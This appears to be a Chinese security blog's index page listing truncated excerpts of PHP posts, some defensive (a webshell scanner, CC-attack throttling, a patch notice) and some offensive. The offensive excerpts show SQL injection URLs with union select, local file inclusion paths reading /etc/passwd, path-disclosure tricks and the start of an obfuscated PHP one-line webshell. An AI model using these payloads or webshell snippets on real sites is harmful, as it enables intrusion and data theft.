PHP Web 木马扫描器代码

scanner.php: <?php /**************PHP Web木马扫描器************************/ /* [+] 作者: alibaba */ /* [+] QQ: 1499281192 */ /* [+] MSN: weeming21@hotmail.com */ /* [+] 首发: t00ls.net , 转载请注明t00ls */ /* [...

- 阅读全文 -

PHP 5.3.9 - 修补重大Hash冲突漏洞

PHP 5.3.9正式版发布了。 此次更新修复了诸多BUG,如Hash冲突漏洞,对于5.3.8的用户,要速度更新。 Security Enhancements and Fixes in PHP 5.3.9: Added max_input_vars directive to prevent attacks based on hash collisions. (CVE-2011-4885) (HAS...

- 阅读全文 -

PHP批量检查网站的sitemap是否存在

文章转载,话不多说,代码其实可以改的更好点。 <?php $webfile = "sitexml.txt"; $opensite = fopen($webfile, 'r'); function curl($url) { /* * 测试用的浏览器信息 * */ $browsers = array ( "user_agent" => "Mozilla/5.0 (Windows; U; W...

- 阅读全文 -

php设置刷新的间隔时间防护cc攻击

最近几个网站CC不断,了解一下CC的原理,然后勉强找个方法暂时防护下吧。实在是伤不起。 附上现在被攻击的屏蔽截图     <?php     @session_start(); $allow_sep = "1"; //刷新时间 if (isset($_SESSION["post_sep"])) { if (time() - $_SESSION["pos...

- 阅读全文 -

PHP站点安全检测和防范

  今天我们讲讲PHP注入的安全规范,防止自己的网站被sql注入。首先我分析了这站的几个页面     https://www.webshell.cc/show.?id=2227     https://www.webshell.cc/show.php?id=2314     通过最简单的and 1 //and2 这样的注入,我并没有发现问题,但是经过一段时间的研...

- 阅读全文 -

win+php+mysql 注入实战篇

https://www.webshell.cc/answer_view.php?id=10291' //有注入 //常理走:报表。现在mysql几乎都是高级版本。所以一般就不猜测它的版本了。 https://www.webshell.cc/answer_view.php?id=10291%20and%202=4%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12...

- 阅读全文 -

php伪造本地文件包含漏洞

代码:   <?php $page=$_GET[page]; include($page.'php'); ?>   你可以这样使用 https://www.webshell.cc/index.php?page=../etc/passwd https://www.webshell.cc/index.php?page=../../../etc/passwd http://w...

- 阅读全文 -

PHP爆绝对路径方法总结帖

1、单引号爆路径 说明: 直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。 Eg: https://www.webshell.cc/news.php?id=149' 截图:     2、错误参数值爆路径 说明: 将要提交的参数值改成错误值,比如-1。单引号被过滤时不妨试试。 Eg: https://www.webshell.cc/resea...

- 阅读全文 -

php最新变异一句话

注释:站长的任务又加重了,好好认识下,以后见了好清除 本来匿名发在土司上,现在应该传出去了,两个是来自国外的 http://h.ackack.net/tiny-php-shell.html http://www.thespanner.co.uk/2011/09/22/non-alphanumeric-code-in-php/ 具体看国外的文章吧 第一种:1.php <?=($_=@$_GET...

- 阅读全文 -